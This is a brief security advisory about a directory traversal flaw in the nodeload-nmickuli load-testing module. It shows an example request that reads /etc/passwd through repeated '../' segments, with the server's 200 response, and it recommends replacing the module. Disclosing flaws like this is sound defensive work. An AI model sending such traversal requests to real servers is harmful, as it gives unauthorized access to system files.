Overview

nodeload-nmickuli is a module for load testing HTTP services.

nodeload-nmickuli is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.

Example Request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:localhost

and the server's Response

HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

Remediation

Because there is no fix currently, we recommend using a different module.
